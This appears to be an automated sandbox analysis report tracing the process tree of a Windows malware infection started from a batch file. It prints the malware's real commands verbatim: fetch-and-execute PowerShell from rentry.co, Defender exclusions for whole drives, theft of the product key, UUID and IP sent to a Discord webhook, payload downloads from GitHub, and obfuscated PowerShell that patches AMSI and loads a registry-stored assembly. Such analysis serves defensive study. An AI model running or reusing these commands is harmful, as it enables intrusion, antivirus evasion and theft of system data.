cmd.exe cmd.exe PID 4128 wrote to memory of 3028 4128 cmd.exe WMIC.exe PID 4128 wrote to memory of 3028 4128 cmd.exe WMIC.exe PID 4128 wrote to memory of 1812 4128 cmd.exe find.exe PID 4128 wrote to memory of 1812 4128 cmd.exe find.exe PID 2900 wrote to memory of 5112 2900 cmd.exe cmd.exe PID 2900 wrote to memory of 5112 2900 cmd.exe cmd.exe PID 5112 wrote to memory of 2556 5112 cmd.exe reg.exe PID 5112 wrote to memory of 2556 5112 cmd.exe reg.exe PID 5112 wrote to memory of 3048 5112 cmd.exe findstr.exe PID 5112 wrote to memory of 3048 5112 cmd.exe findstr.exe PID 2900 wrote to memory of 2112 2900 cmd.exe cmd.exe PID 2900 wrote to memory of 2112 2900 cmd.exe cmd.exe PID 2112 wrote to memory of 804 2112 cmd.exe curl.exe PID 2112 wrote to memory of 804 2112 cmd.exe curl.exe PID 2900 wrote to memory of 1020 2900 cmd.exe cmd.exe PID 2900 wrote to memory of 1020 2900 cmd.exe cmd.exe PID 1020 wrote to memory of 3388 1020 cmd.exe curl.exe PID 1020 wrote to memory of 3388 1020 cmd.exe curl.exe PID 2900 wrote to memory of 4216 2900 cmd.exe curl.exe PID 2900 wrote to memory of 4216 2900 cmd.exe curl.exe PID 2900 wrote to memory of 400 2900 cmd.exe curl.exe PID 2900 wrote to memory of 400 2900 cmd.exe curl.exe PID 2900 wrote to memory of 2196 2900 cmd.exe curl.exe PID 2900 wrote to memory of 2196 2900 cmd.exe curl.exe PID 2900 wrote to memory of 3000 2900 cmd.exe curl.exe PID 2900 wrote to memory of 3000 2900 cmd.exe curl.exe PID 2900 wrote to memory of 2076 2900 cmd.exe DriverLocator.exe PID 2900 wrote to memory of 2076 2900 cmd.exe DriverLocator.exe PID 2900 wrote to memory of 2076 2900 cmd.exe DriverLocator.exe PID 2900 wrote to memory of 2560 2900 cmd.exe timeout.exe PID 2900 wrote to memory of 2560 2900 cmd.exe timeout.exe PID 2076 wrote to memory of 4752 2076 DriverLocator.exe SMAtMZpm.exe PID 2076 wrote to memory of 4752 2076 DriverLocator.exe SMAtMZpm.exe PID 2900 wrote to memory of 4480 2900 cmd.exe Drivermapper.exe PID 2900 wrote to memory of 4480 2900 cmd.exe Drivermapper.exe PID 2900 wrote to memory of 4668 2900 cmd.exe timeout.exe PID 2900 wrote to memory of 4668 2900 cmd.exe timeout.exe PID 4480 wrote to memory of 4420 4480 Drivermapper.exe powershell.exe PID 4480 wrote to memory of 4420 4480 Drivermapper.exe powershell.exe PID 4480 wrote to memory of 1540 4480 Drivermapper.exe x4V5.2.exe PID 4480 wrote to memory of 1540 4480 Drivermapper.exe x4V5.2.exe PID 4480 wrote to memory of 408 4480 Drivermapper.exe powershell.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 3 IoCs
Processes:
attrib.exeattrib.exeattrib.exepid process 3112 attrib.exe 4376 attrib.exe 1832 attrib.exe
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:640
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:472
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{a0b03bef-0f70-49e4-93e4-31bbeeeee3d6}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1100
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{2a93eae8-0868-45cf-842e-7636e08ae158}2⤵PID:2080
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:696
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:996
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:540
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:464
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1032
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1120 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:xjeLFlXJvxoT{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$BgqrkrvyFKyuUC,[Parameter(Position=1)][Type]$mHOHrtAtbI)$tyEVppdzzpa=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+[Char](108)+''+'e'+''+[Char](99)+''+[Char](116)+'e'+[Char](100)+''+[Char](68)+'e'+'l'+''+'e'+'g'+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'n'+'M'+''+'e'+''+'m'+''+[Char](111)+'r'+[Char](121)+'M'+[Char](111)+''+[Char](100)+'u'+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+'y'+[Char](68)+'e'+'l'+''+'e'+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s'+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+''+[Char](44)+''+'S'+''+'e'+'a'+'l'+''+[Char](101)+'d'+','+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+','+'A'+''+[Char](117)+''+'t'+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+'s',[MulticastDelegate]);$tyEVppdzzpa.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+'p'+''+'e'+''+[Char](99)+'i'+[Char](97)+'l'+'N'+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+',P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$BgqrkrvyFKyuUC).SetImplementationFlags(''+[Char](82)+'un'+[Char](116)+''+[Char](105)+''+[Char](109)+''+'e'+',M'+[Char](97)+''+'n'+''+'a'+'g'+[Char](101)+''+[Char](100)+'');$tyEVppdzzpa.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+[Char](111)+''+[Char](107)+'e',''+[Char](80)+''+'u'+'b'+[Char](108)+''+'i'+''+[Char](99)+''+','+'H'+[Char](105)+''+'d'+'eB'+'y'+''+'S'+'i'+'g'+''+[Char](44)+''+'N'+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+'l'+''+[Char](111)+''+'t'+''+[Char](44)+''+[Char](86)+'i'+'r'+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$mHOHrtAtbI,$BgqrkrvyFKyuUC).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+'t'+''+'i'+''+'m'+''+[Char](101)+''+[Char](44)+'M'+'a'+''+'n'+''+'a'+''+[Char](103)+'e'+'d'+'');Write-Output $tyEVppdzzpa.CreateType();}$XvNsKxOuZSUXC=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+[Char](115)+'t'+'e'+''+'m'+''+[Char](46)+'dll')}).GetType('M'+'i'+''+[Char](99)+'r'+[Char](111)+'s'+[Char](111)+''+'f'+'t'+'.'+'W'+[Char](105)+''+[Char](110)+''+'3'+''+[Char](50)+''+[Char](46)+''+'U'+'n'+'s'+'a'+[Char](102)+''+'e'+'N'+[Char](97)+'t'+[Char](105)+''+[Char](118)+''+'e'+''+[Char](77)+''+[Char](101)+''+'t'+'h'+'o'+''+[Char](100)+'s');$ZmpTZzwfgWUUhb=$XvNsKxOuZSUXC.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+'r'+'oc'+[Char](65)+''+[Char](100)+''+[Char](100)+''+[Char](114)+''+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+','+'S'+''+[Char](116)+''+[Char](97)+''+'t'+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$OnYMlqRfuVuNKBPJRLT=xjeLFlXJvxoT @([String])([IntPtr]);$hGxWaomfUCSBCKIuthHHip=xjeLFlXJvxoT @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$SvHQLalbNuG=$XvNsKxOuZSUXC.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+'H'+'a'+''+[Char](110)+''+'d'+''+'l'+''+'e'+'').Invoke($Null,@([Object](''+'k'+''+'e'+''+[Char](114)+''+'n'+'e'+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+'d'+''+'l'+''+[Char](108)+'')));$FMPRuWkRraqNqN=$ZmpTZzwfgWUUhb.Invoke($Null,@([Object]$SvHQLalbNuG,[Object](''+[Char](76)+''+[Char](111)+'a'+[Char](100)+''+[Char](76)+''+[Char](105)+'b'+'r'+''+'a'+''+[Char](114)+''+[Char](121)+''+'A'+'')));$PtaUzRiaDWdDVxtcq=$ZmpTZzwfgWUUhb.Invoke($Null,@([Object]$SvHQLalbNuG,[Object](''+[Char](86)+'i'+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+''+'P'+''+[Char](114)+''+[Char](111)+'te'+[Char](99)+''+[Char](116)+'')));$znjogQI=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FMPRuWkRraqNqN,$OnYMlqRfuVuNKBPJRLT).Invoke(''+[Char](97)+''+'m'+''+'s'+''+'i'+''+'.'+''+[Char](100)+''+'l'+''+[Char](108)+'');$kJOkllUHVpOiOiyoM=$ZmpTZzwfgWUUhb.Invoke($Null,@([Object]$znjogQI,[Object](''+[Char](65)+'m'+'s'+''+'i'+''+'S'+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+''+'u'+''+[Char](102)+''+'f'+''+[Char](101)+''+[Char](114)+'')));$knRNvBfrBw=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PtaUzRiaDWdDVxtcq,$hGxWaomfUCSBCKIuthHHip).Invoke($kJOkllUHVpOiOiyoM,[uint32]8,4,[ref]$knRNvBfrBw);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$kJOkllUHVpOiOiyoM,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PtaUzRiaDWdDVxtcq,$hGxWaomfUCSBCKIuthHHip).Invoke($kJOkllUHVpOiOiyoM,[uint32]8,0x20,[ref]$knRNvBfrBw);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+'F'+[Char](84)+''+[Char](87)+''+[Char](65)+''+'R'+''+[Char](69)+'').GetValue('x'+'4'+''+[Char](115)+'t'+[Char](97)+''+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2496 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4656
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:DEoEBGJjiChX{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$uOoTGwaAgywXvz,[Parameter(Position=1)][Type]$AGuOKAYXqA)$RmXwndVcdnP=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+''+'l'+''+'e'+''+[Char](99)+'te'+'d'+''+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'n'+'M'+'e'+[Char](109)+'o'+[Char](114)+'y'+'M'+''+'o'+'d'+[Char](117)+''+'l'+''+'e'+'',$False).DefineType('M'+[Char](121)+''+[Char](68)+'e'+'l'+''+[Char](101)+''+[Char](103)+''+[Char](97)+'te'+[Char](84)+''+'y'+'p'+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+','+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+''+[Char](44)+''+[Char](83)+''+'e'+''+[Char](97)+''+'l'+''+[Char](101)+''+[Char](100)+',A'+[Char](110)+''+[Char](115)+''+'i'+''+'C'+'la'+[Char](115)+''+[Char](115)+''+','+''+'A'+'uto'+[Char](67)+''+'l'+''+'a'+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$RmXwndVcdnP.DefineConstructor('RT'+[Char](83)+''+'p'+'e'+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+'N'+'a'+[Char](109)+''+'e'+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+''+[Char](101)+''+'B'+''+'y'+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+''+[Char](80)+''+'u'+'b'+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$uOoTGwaAgywXvz).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+'t'+[Char](105)+''+[Char](109)+''+[Char](101)+','+[Char](77)+'a'+[Char](110)+''+[Char](97)+'g'+'e'+'d');$RmXwndVcdnP.DefineMethod('I'+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+''+'i'+''+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+'eB'+'y'+''+'S'+'ig'+','+''+[Char](78)+'e'+'w'+'S'+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+[Char](86)+'i'+[Char](114)+'t'+[Char](117)+''+'a'+'l',$AGuOKAYXqA,$uOoTGwaAgywXvz).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+'M'+'a'+''+[Char](110)+''+'a'+'ge'+[Char](100)+'');Write-Output $RmXwndVcdnP.CreateType();}$XGNzFszxOfdtL=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+'.'+''+'d'+''+[Char](108)+''+'l'+'')}).GetType(''+'M'+'i'+'c'+''+'r'+''+'o'+''+[Char](115)+''+'o'+''+[Char](102)+''+[Char](116)+'.'+[Char](87)+'i'+[Char](110)+''+[Char](51)+''+'2'+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+'s'+''+'a'+'f'+[Char](101)+''+[Char](78)+''+[Char](97)+'t'+[Char](105)+''+[Char](118)+''+'e'+''+[Char](77)+''+[Char](101)+''+'t'+'hod'+[Char](115)+'');$uqvipmuGFvoYqY=$XGNzFszxOfdtL.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+'P'+[Char](114)+''+[Char](111)+'c'+[Char](65)+''+[Char](100)+''+[Char](100)+''+'r'+''+'e'+''+[Char](115)+'s',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+'b'+'l'+[Char](105)+''+'c'+''+[Char](44)+'S'+'t'+'atic'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$eHuKsvmAVPIIiRnVQsw=DEoEBGJjiChX @([String])([IntPtr]);$zVZKtbqIDcbtSGwsaNpBbj=DEoEBGJjiChX @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$eaFLgIIWtvN=$XGNzFszxOfdtL.GetMethod(''+'G'+''+'e'+''+[Char](116)+''+'M'+''+[Char](111)+'d'+[Char](117)+''+'l'+''+'e'+''+'H'+''+'a'+''+[Char](110)+''+'d'+''+'l'+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+'r'+''+'n'+''+[Char](101)+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+'d'+'l'+'l')));$wABVHMQrYEjHvh=$uqvipmuGFvoYqY.Invoke($Null,@([Object]$eaFLgIIWtvN,[Object](''+[Char](76)+''+'o'+'a'+'d'+''+[Char](76)+''+[Char](105)+'b'+[Char](114)+''+[Char](97)+''+[Char](114)+''+'y'+''+[Char](65)+'')));$COnTZLLtMOEuyAgOn=$uqvipmuGFvoYqY.Invoke($Null,@([Object]$eaFLgIIWtvN,[Object]('V'+'i'+''+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+''+[Char](108)+'Pr'+[Char](111)+''+[Char](116)+'ec'+'t'+'')));$raCDuSL=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($wABVHMQrYEjHvh,$eHuKsvmAVPIIiRnVQsw).Invoke('a'+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'');$JzmyhkInvwLCaepRW=$uqvipmuGFvoYqY.Invoke($Null,@([Object]$raCDuSL,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+'an'+[Char](66)+''+[Char](117)+'f'+'f'+''+'e'+'r')));$xSmRcpBvxE=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($COnTZLLtMOEuyAgOn,$zVZKtbqIDcbtSGwsaNpBbj).Invoke($JzmyhkInvwLCaepRW,[uint32]8,4,[ref]$xSmRcpBvxE);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$JzmyhkInvwLCaepRW,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($COnTZLLtMOEuyAgOn,$zVZKtbqIDcbtSGwsaNpBbj).Invoke($JzmyhkInvwLCaepRW,[uint32]8,0x20,[ref]$xSmRcpBvxE);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOF'+[Char](84)+''+[Char](87)+''+'A'+''+[Char](82)+''+[Char](69)+'').GetValue(''+'x'+''+'4'+''+[Char](115)+''+'t'+''+[Char](97)+''+[Char](103)+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
PID:1616
-
-
C:\Users\Admin\x4MaliciousC:\Users\Admin\x4Malicious2⤵
- Executes dropped EXE
PID:544
-
-
C:\Users\Admin\x4MaliciousC:\Users\Admin\x4Malicious2⤵
- Executes dropped EXE
PID:1044
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1144
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1176
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1256
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵PID:1268
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1308
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
PID:1412
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1420
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2576
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1520
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1532
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:1668
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1676
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1708
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1804
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1856
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1892
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1904
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2008
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:2032
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2096
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2232
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2244
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2596
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2640
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2648
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:2700
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2788
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2804
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2824
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2832
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2852
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3100
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of UnmapMainImage
PID:3216 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Virus.cmd"2⤵
- Suspicious use of WriteProcessMemory
PID:4572 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "irm rentry.co/_setup/raw | iex3⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1940 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Public\uninstaller.bat"4⤵PID:1444
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\ProgramData\winlog32.bat"4⤵
- Suspicious use of WriteProcessMemory
PID:2900 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:1332
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -WindowStyle Hidden -Command ""5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1576
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c mountvol | find ":\"5⤵
- Suspicious use of WriteProcessMemory
PID:3328 -
C:\Windows\system32\mountvol.exemountvol6⤵PID:1224
-
-
C:\Windows\system32\find.exefind ":\"6⤵PID:3240
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -c add-mppreference -exclusionpath C:\5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3664
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -c add-mppreference -exclusionpath F:\5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1692
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -c add-mppreference -exclusionpath D:\5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:424
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic csproduct get uuid /value | find /i "uuid="5⤵
- Suspicious use of WriteProcessMemory
PID:4128 -
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid /value6⤵
- Suspicious use of AdjustPrivilegeToken
PID:3028
-
-
C:\Windows\system32\find.exefind /i "uuid="6⤵PID:1812
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "hkey_local_machine\software\microsoft\windows nt\currentversion\softwareprotectionplatform" /V "BackupProductKeyDefault" | findstr /ri "REG_SZ"5⤵
- Suspicious use of WriteProcessMemory
PID:5112 -
C:\Windows\system32\reg.exereg query "hkey_local_machine\software\microsoft\windows nt\currentversion\softwareprotectionplatform" /V "BackupProductKeyDefault"6⤵PID:2556
-
-
C:\Windows\system32\findstr.exefindstr /ri "REG_SZ"6⤵PID:3048
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl --silent icanhazip.com5⤵
- Suspicious use of WriteProcessMemory
PID:2112 -
C:\Windows\system32\curl.execurl --silent icanhazip.com6⤵PID:804
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl -ks "https://rentry.co/cbkt9fio/raw"5⤵
- Suspicious use of WriteProcessMemory
PID:1020 -
C:\Windows\system32\curl.execurl -ks "https://rentry.co/cbkt9fio/raw"6⤵PID:3388
-
-
-
C:\Windows\system32\curl.execurl -H "Content-Type: application/json" -d "{\"username\": \"TrollSec\", \"embeds\": [{\"title\": \"Enemey Down\", \"color\": 1, \"fields\": [{\"name\": \"Enemey Informations :\", \"value\": \" ```Admin/UJHKQCDS``` **Unique Identifier** `````` **Product Key** ```YC7N8-G7WR6-9WR4H-6Y2W4-KBT6X``` **IP Address** ```191.101.209.39``` \"}],\"thumbnail\":{\"url\": \"\"}, \"footer\":{\"text\": \"17:07:55.18/Fri 06/21/2024\"}}]}" https://discord.com/api/webhooks/1247862642509484092/vR90Kb-l3UPi2-9HRZ2fJ7o7Q0EBnbyiLGfvtKGN75kUdsj5C5BQ0HaTzj15zyWZuFsZ5⤵PID:4216
-
-
C:\Windows\system32\curl.exeCurl -L --Silent "https://github.com/xst4/patch1/releases/download/payloads/uninstaller" --output "C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe"5⤵
- Drops file in System32 directory
PID:400
-
-
C:\Windows\system32\curl.exeCurl -L --Silent "https://github.com/xst4/patch1/releases/download/payloads/winhlp32.ex" --output "C:\Windows\SysWOW64\winrm\Microsoft\Drivermapper.exe"5⤵
- Drops file in System32 directory
PID:2196
-
-
C:\Windows\system32\curl.exeCurl -L --Silent "https://github.com/xst4/patch1/releases/download/payloads/x4joex.exe" --output "C:\Windows\SysWOW64\winrm\Microsoft\drivermapperJoex.exe"5⤵
- Drops file in System32 directory
PID:3000
-
-
C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe"C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2076 -
C:\Users\Admin\AppData\Local\Temp\SMAtMZpm.exe"C:\Users\Admin\AppData\Local\Temp\SMAtMZpm.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4752
-
-
-
C:\Windows\system32\timeout.exetimeout /t 5 /nobreak5⤵
